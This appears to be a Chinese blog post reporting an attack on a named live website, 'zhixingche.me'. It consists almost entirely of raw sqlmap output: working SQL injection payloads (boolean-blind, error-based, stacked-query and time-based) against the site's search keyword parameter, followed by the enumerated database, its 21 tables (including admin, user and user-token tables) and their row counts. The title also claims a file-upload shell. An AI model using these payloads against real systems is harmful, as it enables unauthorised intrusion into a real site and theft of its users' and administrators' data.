mysql文件上传漏洞_智行车SQL注入漏洞+后台任意文件上传(已Getshell)

---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND 3677=3677 AND "VuZD" LIKE "VuZDType: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND (SELECT 7174 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7174=7174,1))),0x71787a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "AMtI" LIKE "AMtIType: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=";(SELECT * FROM (SELECT(SLEEP(20)))KYvQ)#Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND (SELECT * FROM (SELECT(SLEEP(20)))QpZl) AND "FqYz" LIKE "FqYz

---

back-end DBMS: MySQL 5.0

available databases [2]:

[*] information_schema

[*] zhixingchesqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND 3677=3677 AND "VuZD" LIKE "VuZDType: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND (SELECT 7174 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(7174=7174,1))),0x71787a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "AMtI" LIKE "AMtIType: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=";(SELECT * FROM (SELECT(SLEEP(5)))KYvQ)#Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND (SELECT * FROM (SELECT(SLEEP(5)))QpZl) AND "FqYz" LIKE "FqYz

---

back-end DBMS: MySQL 5.0

Database: zhixingche

[21 tables]

+--------------------+

| tbl_admin |

| tbl_after_sale |

| tbl_apply |

| tbl_config |

| tbl_forum |

| tbl_forum_comment |

| tbl_forum_post |

| tbl_item |

| tbl_message |

| tbl_order |

| tbl_order_item |

| tbl_post |

| tbl_post_action |

| tbl_post_category |

| tbl_post_comment |

| tbl_post_favourite |

| tbl_region |

| tbl_special |

| tbl_user |

| tbl_user_address |

| tbl_user_token |

+--------------------+Database: zhixingche

+--------------------+---------+

| Table | Entries |

+--------------------+---------+

| tbl_region | 3244 |

| tbl_post | 367 |

| tbl_user | 105 |

| tbl_forum_comment | 102 |

| tbl_post_action | 101 |

| tbl_user_token | 66 |

| tbl_forum_post | 38 |

| tbl_message | 9 |

| tbl_post_category | 7 |

| tbl_post_favourite | 7 |

| tbl_post_comment | 6 |

| tbl_admin | 5 |

| tbl_forum | 2 |

| tbl_config | 1 |

+--------------------+---------+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值